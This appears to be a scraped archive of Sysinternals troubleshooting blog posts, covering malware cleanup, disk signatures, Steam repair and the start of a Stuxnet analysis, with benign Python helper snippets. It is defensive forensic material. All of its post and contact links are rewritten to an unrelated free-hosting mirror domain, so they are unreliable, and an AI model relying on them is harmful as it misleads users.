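    if not re.fullmatch(r"[0-9a-fA-F]{8}", signature):
        raise ValueError("an MBR disk signature is exactly eight hex digits")
    # Same two commands as entered interactively: select the disk, then
    # write the original signature back to it.
    return "select disk {}\nuniqueid disk id={}\n".format(
        disk_number, signature.lower()
    )


print(build_diskpart_script(2, "e9eb3aa5"), end="")
```

<P> Saving the output to a text file and running Diskpart with its /s option from an administrative command prompt executes the commands in order. Double-check the disk number first, because the script writes to whichever disk it selects. 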
</P> </BODY></HTML> Thu, 27 Jun 2019 07:22:16 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/fixing-disk-signature-collisions/ba-p/724114 MarkRussinovich 2019-06-27T07:22:16Z The Case of the Mysterious Reboots https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-mysterious-reboots/ba-p/724100 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Oct 02, 2011 </STRONG> <BR /> <P> This case opens when a Sysinternals power user, who also works as a system administrator at a large corporation, had a friend report that their laptop had become unusable. Whenever the friend connected it to a network, their laptop would reboot. The power user, upon getting hold of the laptop, first verified the behavior by connecting it to a wireless network. The system instantly rebooted, first into safe mode, then again back into a normal Windows startup. He tried booting the laptop into safe mode directly, hoping that whatever was causing the problem would be inactive in that mode, but logging on only resulted in an automatic logoff. Returning to a normal boot, he noticed that <A href="#" target="_blank"> Microsoft Security Essentials </A> (MSE) was installed and tried to launch it. 
Double-clicking the icon had no effect, however, and double-clicking its entry in the Programs and Features section of the Control Panel resulted in an error message: </P> <P> <IMG alt="image" border="0" height="170" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7563.image46_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121359i70603E6A7F04519B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="354" /> </P> <P> Hovering his mouse over the MSE icon in the start menu gave the explanation: the link was pointing at a bogus location likely created by malware: </P> <P> <IMG alt="image" border="0" height="290" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8244.image51_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121360iF867DA884D1B19FF" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="354" /> </P> <P> Because he couldn’t get to the network, he couldn’t easily repair the corrupted MSE installation. Wondering if the Sysinternals tools might help, he copied <A href="#" target="_blank"> Process Explorer </A> and <A href="#" target="_blank"> Autoruns </A> to a USB key, and then copied them from the key to the laptop, which he was now convinced was infected. 
Launching Process Explorer, he was greeted with the following process tree: </P> <P> <IMG alt="image" border="0" height="513" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6862.image_5F00_thumb_5F00_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121361i82E4943871B6226B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> In my Blackhat presentation, <A href="#" target="_blank"> Zero Day Malware Cleaning with the Sysinternals Tools </A> , I present a list of characteristics commonly exhibited by malicious processes. They include having no icon, company name, or description, residing in the %Systemroot% or %Userprofile% directories, and being “packed” (encrypted or compressed). While there’s a class of sophisticated malware that doesn’t have any of these attributes, most malware still does. This case is a great example. Process Explorer looks for the signatures of common executable compression tools like <A href="#" target="_blank"> UPX </A> , as well as heuristics that include Portable Executable image layouts used by compression engines, and highlights matches in a “packed” highlight color. The default color, fuchsia, is visible on about a dozen processes in the process view. Further, every single one of the highlighted processes lacks a description and company name (though a few have icons). </P> <P> Many of them also have names that are the same, or similar to, legitimate Windows system executables. 
The one highlighted below has a name that matches the Windows <A href="#" target="_blank"> Svchost.exe </A> executable, but has an icon (borrowed from Adobe Flash) and resides in a nonstandard directory, C:\Windows\Update.1: </P> <P> <IMG alt="image" border="0" height="149" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5710.image_5F00_thumb_5F00_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121362iD14B2CD3F163BD7D" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <P> Another process with a name not matching that of any Windows executable, but whose name, Svchostdriver.exe, is similar enough to confuse someone not intimately familiar with Windows internals, actually has TCP/IP sockets listening for connections, presumably from a botmaster: </P> <P> <IMG alt="image" border="0" height="123" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/0435.image_5F00_thumb_5F00_19.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121363i6728ED6482E50FDE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> There was no question that the computer was severely infected. 
Autoruns revealed malware using several different activation points, and showed that even Safe Mode with Command Prompt didn’t work properly because a bogus executable called Services32.exe (another legitimate-looking name) had registered as the Safe Mode AlternateShell, which is by default Cmd.exe (command prompt): </P> <P> <IMG alt="image" border="0" height="416" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4834.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121364iA6F673AC6773BBC2" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> My recommendation for cleaning malware is to first leverage antimalware utilities if possible. Antimalware might address some or all of an infection, so why do work if you don’t have to? But this system couldn’t connect to the Internet, which ruled out easily repairing the MSE installation or downloading other antimalware like the <A href="#" target="_blank"> Microsoft Malicious Software Removal Tool </A> (MSRT). The power user had seen me use the Process Explorer suspend functionality at a conference to suspend malware processes in order to prevent them from restarting each other when someone trying to clean the system terminates one. Maybe if he suspended all the processes that looked malicious he’d be able to connect to the network without having the system reboot? It was worth a shot. 
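</P> <P> Deciding which processes “looked malicious” comes down to the characteristics listed earlier. As a rough illustration, the Python sketch below turns that list into a checklist. The function name, the dictionary fields, and the sample record are all hypothetical; in practice you would read these attributes from Process Explorer’s columns, and no single trait proves that a process is malware. </P>

```python
import ntpath  # Windows path rules, usable on any platform


def suspicious_traits(proc, system_root, user_profile):
    """List which of the commonly seen malware traits a process exhibits."""
    traits = []
    # Missing icon, company name, or description.
    for field in ("icon", "company", "description"):
        if not proc.get(field):
            traits.append("no " + field)
    # Image file located under %Systemroot% or %Userprofile%.
    image_dir = ntpath.normcase(ntpath.dirname(proc["path"]))
    for label, root in (("%Systemroot%", system_root),
                        ("%Userprofile%", user_profile)):
        root = ntpath.normcase(root)
        if image_dir == root or image_dir.startswith(root + "\\"):
            traits.append("resides under " + label)
    # Flagged as packed (compressed or encrypted).
    if proc.get("packed"):
        traits.append("packed")
    return traits


# Illustrative record loosely modeled on the fake Svchost.exe in this case.
sample = {
    "name": "svchost.exe",
    "path": r"C:\Windows\Update.1\svchost.exe",
    "icon": True,
    "company": "",
    "description": "",
    "packed": True,
}
print(suspicious_traits(sample, r"C:\Windows", r"C:\Users\example"))
```

<P> A process that collects several of these traits at once, as the sample does, is a reasonable candidate for suspension while you investigate further. 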
</P> <P> Right-clicking on each malicious process in turn, he selected Suspend from the context menu to put the process into a state of limbo: </P> <P> <IMG alt="image" border="0" height="244" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3568.image_5F00_thumb_5F00_21.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121365i33F704486F77C54A" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="192" /> </P> <P> When he was done, the process tree looked like this, with suspended processes colored grey: </P> <P> <IMG alt="image" border="0" height="504" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8546.image_5F00_thumb_5F00_22.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121366i27B52A6827828BCD" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Now to see if the trick worked: he connected to the wireless network. Bingo, no reboot. Now connected to the Internet, he proceeded to download MSE, install it, and perform a thorough scan of the system. The engine cranked along, reporting discovered infections as it went. 
When it finished, it had found four separate malware strains, <A href="#" target="_blank"> Trojan:Win32/Teniel </A> , <A href="#" target="_blank"> Backdoor:Win32/Bafruz.C </A> , <A href="#" target="_blank"> Trojan:Win32/Malex.gen!E </A> , and <A href="#" target="_blank"> Trojan:Win32/Sisron </A> : </P> <P> <IMG alt="image" border="0" height="92" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/0842.image_5F00_thumb_5F00_23.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121367i12135F046DF73652" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="244" /> </P> <P> After rebooting, which was noticeably faster than before, he connected to the network without trouble. As a final check, he launched Process Explorer to see if any suspicious processes remained. To his relief, the process tree looked clean: </P> <P> <IMG alt="image" border="0" height="578" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8546.image_5F00_thumb_5F00_25.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121368i5D2085844FC907BB" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Another case solved with the help of the Sysinternals tools! The new <A href="#" target="_blank"> Windows Sysinternals Administrator’s Reference </A> , authored by Aaron Margosis and me, covers all the tools and their features in detail, giving you the tools and techniques required to solve problems related to sluggish performance, misleading error messages, and application crashes. And if you’re interested in cyber-security, be sure to get a copy of my technothriller <A href="#" target="_blank"> Zero Day </A> . 
</P> </BODY></HTML> Thu, 27 Jun 2019 07:20:57 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-mysterious-reboots/ba-p/724100 MarkRussinovich 2019-06-27T07:20:57Z The Case of the Hung Game Launcher https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-hung-game-launcher/ba-p/724089 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jul 18, 2011 </STRONG> <BR /> <P> I love the cases people send me where the <A href="#" target="_blank"> Sysinternals </A> tools have helped them successfully troubleshoot, but nothing is more satisfying than using them to solve my own cases. This case in particular was fun because, well, solving it helped me get back to having fun. </P> <P> When I have time, I occasionally play PC games to let off steam (pun intended, as you’ll see). One of my favorites over the last few years was the puzzle game, <A href="#" target="_blank"> Portal </A> . I enjoyed the first Portal so much that I pre-ordered <A href="#" target="_blank"> Portal 2 </A> on Valve’s <A href="#" target="_blank"> Steam </A> network when it became available and played through it within a few hours of its release. Since then, I’ve been playing community-developed maps. Last Saturday I started a particularly fun map, a winner from a <A href="#" target="_blank"> community map contest </A> , but didn’t have time to finish it in one sitting. The next morning I returned to my PC, double-clicked on the Portal 2 desktop icon, and got the standard Steam launch dialog. 
The game normally launches in a couple of seconds, but this time the dialog just sat there: </P> <P> <IMG alt="image" border="0" height="148" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/2287.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121351i1E417358CE2C1559" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="324" /> </P> <P> I killed Steam and double-clicked again, but again the dialog hung. I captured a Process Monitor trace and looked at the stacks of Steam’s threads in Process Explorer, but didn’t see any clues. Figuring that perhaps Portal 2’s configuration or installation had somehow been corrupted, I deleted Portal 2, re-downloaded it, and reinstalled it. That didn’t fix the problem, though. With Portal 2 reset to a clean state, that left either Steam or some general Windows issue to blame. The next step was therefore to reinstall Steam. </P> <P> I first went to the Uninstall or Change a Program page in the Control Panel, but double-clicking on the Steam entry brought up a dialog asking me to confirm uninstalling it and warning that doing so would delete all local content.&nbsp; I didn’t want to risk losing my game settings or have to reinstall all my games, so I aborted the uninstall. Most Microsoft Installer Service (MSI)-based installers have a repair option that reinstalls the application without deleting user data or configuration, so I went to the Steam home page, downloaded and executed the Steam installer. 
Sure enough, the install wizard offered the repair option: </P> <P> <IMG alt="image" border="0" height="274" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6404.image_5F00_thumb_5F00_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121352i311429C7D080DA47" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="354" /> </P> <P> When I pressed the Next button, though, I was greeted with an obviously misleading error message that reported a network error while trying to read from a local file: </P> <P> <IMG alt="image" border="0" height="269" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3364.image_5F00_thumb_5F00_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121353i4ECB6595BD7A67D6" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="354" /> </P> <P> I turned to <A href="#" target="_blank"> Process Monitor </A> again and captured a trace of the failed repair operation. The error message referred to a file named SteamInstall[1].msi, so I searched the log file for that string. 
The first hit was the data value read in a query of a registry value under HKCR\Installer\Products named PackageName: </P> <P> <IMG alt="image" border="0" height="52" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4857.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121354i4D1D10E6662C94A4" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The next hits, a few operations later, were attempts by the installer to read from the file location printed in the error dialog: </P> <P> <IMG alt="image" border="0" height="43" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7870.image_5F00_thumb_5F00_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121355iD05A4FC471B27D3B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> That the installer was reading the file name from an existing registry key and the file’s location was in Internet Explorer’s (IE’s) download cache suggested that it was trying to launch the copy of itself that had performed the initial install. Because I had originally launched the installer via IE directly from the Valve web site, just like I was doing now, the download location was in IE’s download cache, but the file must have aged out and been deleted since then. </P> <P> The Process Monitor trace revealed that the installer was reading the original location from the registry, so if I pointed the registry at the installer’s new download location, I could trick it into launching itself, rather than looking for the previous copy that was now missing. 
I scanned the log for the new download location by searching for Steaminstall.msi and found its path, another download cache location: </P> <P> <IMG alt="image" border="0" height="50" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8463.image_5F00_thumb_5F00_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121356i9D67FB1034B775E1" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> I then went back to the registry query’s entry, right-clicked on it, and selected “Jump To” from the context menu. That caused Process Monitor to launch Regedit and navigate directly to the registry key, where I updated the LastUsedSource and PackageName values to reflect the new download location: </P> <P> <IMG alt="image" border="0" height="61" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1614.image_5F00_thumb_5F00_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121357i0FB0FEFE15E12487" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <P> Next, I dismissed the installer’s error dialog, which I had left open, and pressed the wizard’s Next button to try the repair again. 
This time, Steam proceeded to reinstall and the wizard concluded with a message of success: </P> <P> <IMG alt="image" border="0" height="140" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/0131.image_5F00_thumb_5F00_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121358iE66DC0E43A8564D2" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="354" /> </P> <P> Crossing my fingers, I launched Portal 2. Steam’s ‘Preparing to Launch’ dialog flashed for a second and then Portal 2’s splash screen took over the screen: case closed. Uninstalling and then reinstalling Steam and all the games would have likely led to the same conclusion, but Process Monitor had surely saved me a lot of time and possibly even my saved game state and configurations. In just a few minutes I was back to solving puzzles of a different kind. </P> <P> Check out the new <A href="#" target="_blank"> Windows Sysinternals Administrator’s Reference </A> by me and Aaron Margosis for more tips on using all 70+ Sysinternals tools to troubleshoot and manage your Windows systems! Buy a copy by August 15, email the receipt to me at <A href="https://gorovian.000webhostapp.com/?exam=mailto:markruss@ntdev.microsoft.com" target="_blank"> markruss@ntdev.microsoft.com </A> and I’ll enter you for a drawing of one of 10 signed copies of <A href="#" target="_blank"> Zero Day </A> I’m giving away. </P> <P> <EM> Mark Russinovich is a Technical Fellow on the Windows Azure team at Microsoft and is author of <A href="#" target="_blank"> Windows Internals </A> , <A href="#" target="_blank"> The Windows Sysinternals Administrator’s Reference </A> , and the cyberthriller <A href="#" target="_blank"> Zero Day: A Novel </A> . 
You can contact him at </EM> <A href="https://gorovian.000webhostapp.com/?exam=mailto:markruss@ntdev.microsoft.com" target="_blank"> <EM> markruss@ntdev.microsoft.com </EM> </A> <EM> . </EM> </P> </BODY></HTML> Thu, 27 Jun 2019 07:19:42 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-hung-game-launcher/ba-p/724089 MarkRussinovich 2019-06-27T07:19:42Z Troubleshooting with the New Sysinternals Administrator’s Reference https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/troubleshooting-with-the-new-sysinternals-administrator-8217-s/ba-p/724079 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jul 03, 2011 </STRONG> <BR /> <IMG align="right" alt="image" border="0" height="187" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5700.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121348i4C5FA30CEB19496F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; margin-left: 0px; border-left-width: 0px; margin-right: 0px" title="image" width="154" /> <P> <A href="#" target="_blank"> Aaron Margosis </A> and I are thrilled to announce that the long awaited, and some say long overdue, official guide to the <A href="#" target="_blank"> Sysinternals tools is now available </A> ! I’ve always had the idea of writing a book on the tools in the back of my mind, but it wasn’t until a couple of years ago that <A href="#" target="_blank"> Dave Solomon </A> , my coauthor on <A href="#" target="_blank"> <EM> Windows Internals </EM> </A> , convinced me to pursue it. After a few false starts, I decided that a coauthor would help get the book done more quickly, and turned to Aaron, a good friend of mine who’s also a long-time user and expert on the tools at his day job in the Federal Division of Microsoft Consulting Services. 
It was a great choice and I’m proud to put the Sysinternals brand on the book. </P> <P> Whether you’re new to the tools or have been using them since Bryce Cogswell (my Sysinternals and Winternals Software cofounder, now retired) and I released NTFSDOS in 1996, you’re sure to take away new insights that will give you the edge when tackling tough problems and managing your Windows systems. </P> <P> The book covers all 70+ tools, with chapters dedicated to the major tools like <A href="#" target="_blank"> Process Explorer </A> , <A href="#" target="_blank"> Process Monitor </A> , and <A href="#" target="_blank"> Autoruns </A> . For each we provide a thorough tour of all of the tool’s features, explain how to use the tool, and include our favorite tips and techniques. There’s no better way to learn than by example, though. The last section of the book will be familiar to anyone who’s read this blog or watched my <A href="#" target="_blank"> Case of the Unexplained </A> conference sessions, because it presents 17 real-world cases that show how Windows power users and administrators like you solved otherwise impossible-to-solve problems by using the tools. </P> <P> The book is available for purchase on <A href="#" target="_blank"> Amazon.com </A> and available from O'Reilly in <A href="#" target="_blank"> 4 ebook formats </A> , or you can read it online through <A href="#" target="_blank"> Safari </A> . </P> <P> The eBook has only been out for a couple of weeks and we’ve already heard from someone who bought the book and immediately used what he learned to solve a case that was literally ruining his sleep. I thought it only appropriate to include it here in the blog post announcing the book. </P> <P> Let us know what you think of the book by dropping us an email, and as I say in my dedication to you - my fellow Windows troubleshooters - at the front of the book, <A href="#" target="_blank"> never give up, never surrender! 
</A> </P> <H3> The Case of the Mysterious Sounds </H3> <P> The case opened several weeks ago when a user started hearing sounds from the computer in his bedroom. The sound, a simple short tone, came randomly, sometimes only once per day, other times a few times in an hour. Every time he heard it, he’d jump to the computer, open Process Explorer, and look for clues as to what might be responsible, but the sounds persisted even when he had no applications open. On a few occasions he was woken from sleep and learned to mute the speaker before heading to bed. His life began to unravel from his lack of sleep and growing frustration. Work suffered, he was short with his friends, and he started to wonder if he had a ghost. </P> <P> Then last week he saw the announcement that the Sysinternals book was available. He had been a casual user of the tools and thought that getting a deeper understanding might help his IT management responsibilities at work. When he reached the chapter on Process Monitor, he read that many years ago Dave Solomon found Process Monitor so useful at uncovering root causes to such a wide array of problems, that he coined the phrase “when in doubt, run Process Monitor.” With little to lose, he decided to give the advice a try on his haunted home system. </P> <P> He configured a filter for files ending in .WAV, hypothesizing that the sound was stored in that common format. Since he didn’t know how long it would take for a sound to reoccur, he needed to leave Process Monitor running for many hours. So that it wouldn’t exhaust the system’s virtual memory or fill up the disk, he used its “drop filtered events” feature to only record events matching the active filter. He left Process Monitor running and went to work. When he arrived home, he eagerly went to the computer to see if the culprit had been caught. 
Almost collapsing with relief, he saw eight operations had matched the filter: </P> <P> <IMG alt="image" border="0" height="213" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3817.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121349i5EA06B3F152D5391" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The tooltip clearly revealed that the wireless adapter’s applet had played a sound. Then it all clicked: the computer was just in range of the wireless base station, so while it had a decent connection most of the time, occasionally the connection would drop. He suspected that the applet chimed to announce when the connection was restored. Expecting that it would offer an option to disable the notification, he right-clicked on the tray icon. Sure enough, “Enable Internet Connected Notification” was checked: </P> <P> <IMG alt="image" border="0" height="121" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3733.image_5F00_thumb_5F00_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121350iF926ED17AE6BAC0C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="373" /> </P> <P> Since he unchecked it, the computer hasn’t made any unexpected noises and the case was closed. As a result, his sleep has returned to normal, he’s getting along with his friends, and his use of what he’s learned from the Sysinternals Administrator’s Reference has made him a star at work. 
</P> <P> <EM> Mark Russinovich is a Technical Fellow on the Windows Azure team at Microsoft and is author of <A href="#" target="_blank"> Windows Internals </A> , <A href="#" target="_blank"> The Windows Sysinternals Administrator’s Reference </A> , and the cyberthriller <A href="#" target="_blank"> Zero Day: A Novel </A> . You can contact him at </EM> <A href="https://gorovian.000webhostapp.com/?exam=mailto:markruss@ntdev.microsoft.com" target="_blank"> <EM> markruss@ntdev.microsoft.com </EM> </A> <EM> . </EM> </P> </BODY></HTML> Thu, 27 Jun 2019 07:18:41 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/troubleshooting-with-the-new-sysinternals-administrator-8217-s/ba-p/724079 MarkRussinovich 2019-06-27T07:18:41Z The Zero Day Book Trailer https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-zero-day-book-trailer/ba-p/724075 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on May 03, 2011 </STRONG> <BR /> <P> I just got back the finished version of the video trailer for my new cyber thriller <A href="#" target="_blank"> Zero Day </A> , which I think came out awesome! It’s not hard to imagine what a Zero Day movie trailer would look like. Let me know what you think. 
</P> <DIV class="wlWriterEditableSmartContent" id="scid:5737277B-5D6D-4f48-ABFC-DD9C333F4C5D:9d6054fb-9e77-4f59-947e-b9454afe9a5b" style="padding-bottom: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; float: none; padding-top: 0px"> <DIV id="c9bae1f3-6b6e-4109-8ecf-7a520af80af0" style="margin: 0px; padding: 0px; display: inline;"> <DIV> <IMG alt="" galleryimg="no" onload="var downlevelDiv = document.getElementById('c9bae1f3-6b6e-4109-8ecf-7a520af80af0'); downlevelDiv.innerHTML = &quot;&lt;div&gt;&lt;object width=\&quot;448\&quot; height=\&quot;252\&quot;&gt;&lt;param name=\&quot;movie\&quot; value=\&quot;https://www.youtube.com/v/ucyMBYg9RWU?hl=en&amp;hd=1\&quot;&gt;&lt;\/param&gt;&lt;embed src=\&quot;https://www.youtube.com/v/ucyMBYg9RWU?hl=en&amp;hd=1\&quot; type=\&quot;application/x-shockwave-flash\&quot; width=\&quot;448\&quot; height=\&quot;252\&quot;&gt;&lt;\/embed&gt;&lt;\/object&gt;&lt;\/div&gt;&quot;;" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3757.videod487c20efd10_5F00_61C04581.jpg" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121347iF1DF90E54D9D761D" style="border-style: none" /> </DIV> </DIV> <DIV style="width:448px;clear:both;font-size:.8em"> Zero Day Book Trailer </DIV> </DIV> </BODY></HTML> Thu, 27 Jun 2019 07:18:17 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-zero-day-book-trailer/ba-p/724075 MarkRussinovich 2019-06-27T07:18:17Z Analyzing a Stuxnet Infection with the Sysinternals Tools, Part 3 https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/analyzing-a-stuxnet-infection-with-the-sysinternals-tools-part-3/ba-p/724073 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Apr 17, 2011 </STRONG> <BR /> <P> In the <A href="#" target="_blank"> first post of this series </A> , I used <A href="#" target="_blank"> Autoruns </A> , <A href="#" target="_blank"> 
Process Explorer </A> and <A href="#" target="_blank"> VMMap </A> to statically analyze a Stuxnet infection on Windows XP. That phase of the investigation revealed that Stuxnet infected multiple processes, launched infected processes that appeared to be running system executables, and installed and loaded two device drivers. In <A href="#" target="_blank"> the second phase </A> , I turned to the <A href="#" target="_blank"> Process Monitor </A> trace I had captured during the infection and learned that Stuxnet had launched several additional processes during the infection. The trace also uncovered the fact that Stuxnet had dropped four files with the .PNF extension into the C:\Windows\Inf directory. In this concluding post, I use the Sysinternals tools to try to determine the purpose of the PNF files and to look at how Stuxnet used a zero-day vulnerability on Windows 7 (since fixed) to elevate itself to run with administrator rights. </P> <H4> The .PNF Files </H4> <P> My first step in gathering clues about the .PNF files was to just see how large they were. Tiny files would probably be data and larger ones code. The four .PNF files in question are the following, listed with the sizes in bytes I observed in Explorer: </P> <TABLE border="0" cellpadding="2" cellspacing="0" width="209"> <TBODY> <TR> <TD valign="top" width="118"> MDMERIC3.PNF </TD> <TD valign="top" width="89"> 90 </TD> </TR> <TR> <TD valign="top" width="118"> MDMCPQ3.PNF </TD> <TD valign="top" width="89"> 4,943 </TD> </TR> <TR> <TD valign="top" width="118"> OEM7A.PNF </TD> <TD valign="top" width="89"> 498,176 </TD> </TR> <TR> <TD valign="top" width="118"> OEM6C.PNF </TD> <TD valign="top" width="89"> 323,848 </TD> </TR> </TBODY> </TABLE> <P> I also dumped the printable characters contained within the files using the <A href="#" target="_blank"> Sysinternals Strings </A> utility, but saw no legible words. That wasn’t surprising, however, because I expected the files to be compressed or encrypted. 
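</P> <P> The reasoning above (no legible strings suggests compressed or encrypted content) can be illustrated with a short Python sketch. This is not the Sysinternals Strings utility and was not part of the original investigation: the function names, the four-character minimum, and the sample buffers are assumptions chosen for illustration. It extracts runs of printable ASCII and estimates Shannon entropy, which approaches 8 bits per byte for data that looks random. </P>

```python
import math
import re
from collections import Counter
from typing import List


def printable_strings(data: bytes, min_len: int = 4) -> List[bytes]:
    """Return runs of printable ASCII that are at least min_len bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return re.findall(pattern, data)


def shannon_entropy(data: bytes) -> float:
    """Return the entropy of data in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    counts = Counter(data)
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


if __name__ == "__main__":
    # Hypothetical buffers standing in for real files on disk.
    text_like = b"[Version]\r\nSignature=$Windows NT$\r\n" * 50
    uniform = bytes(range(256)) * 16  # every byte value equally frequent

    for name, buf in (("text_like", text_like), ("uniform", uniform)):
        found = printable_strings(buf)
        print(name, len(found), round(shannon_entropy(buf), 2))
```

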